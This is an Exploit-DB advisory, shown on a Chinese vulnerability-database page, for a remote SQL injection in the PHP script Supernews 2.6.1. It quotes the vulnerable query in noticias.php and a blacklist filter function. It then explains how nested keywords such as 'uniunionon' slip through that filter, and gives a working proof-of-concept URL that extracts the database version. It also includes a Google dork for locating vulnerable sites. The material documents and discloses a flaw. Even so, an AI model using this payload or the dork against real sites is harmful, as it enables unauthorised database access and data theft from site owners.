https://www.exploit-db.com/exploits/18961
Supernews 2.6.1 - 'noticias.php?cat' SQL Injection
| 漏洞ID | 1063746 | 漏洞类型 | |
| 发布时间 | 2012-05-31 | 更新时间 | 2012-05-31 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##########################################################################
## Supernews <= 2.6.1 (noticias.php cat) Remote SQL Injection
## Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 31/05/2012
## Version: 2.6.1
## Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
## ISRAEL
##########################################################################
## Author will be not responsible for any damage.
##########################################################################
## Vulnerable Code - noticias.php [30-31]:
30. $idcategoria = formatDados($_GET['cat']);
31. $query = mysql_query("SELECT id, categoria FROM {$prefixdb}notcategorias WHERE id=$idcategoria ORDER BY categoria");
## NOTE:
## As you can see there is filter to variable $idcategoria.
## Function code - funcao.php [106-112]:
106.function formatDados($data) {
107. $data = strip_tags($data);
108. $data = trim($data);
109. $data = get_magic_quotes_gpc() == 0 ? addslashes($data) : $data;
110. $data = preg_replace("@(--|\#|\*|;|select|union|drop|insert|delete|xp_|\=| or |-shutdown|update| and |&|')@s", "", $data);
111. return $data;
112.}
## As you can see, this function can be bypassed easily by the following example:
# string 'uniunionon' will replace to clean 'union'
# string 'seleselectct' will replace to clean 'select'
## SQL Injection PoC:
## http://www.example.com/noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
##########################################################################
# Cya :)
# 0x31337.net
##########################################################################检索漏洞
开始时间
结束时间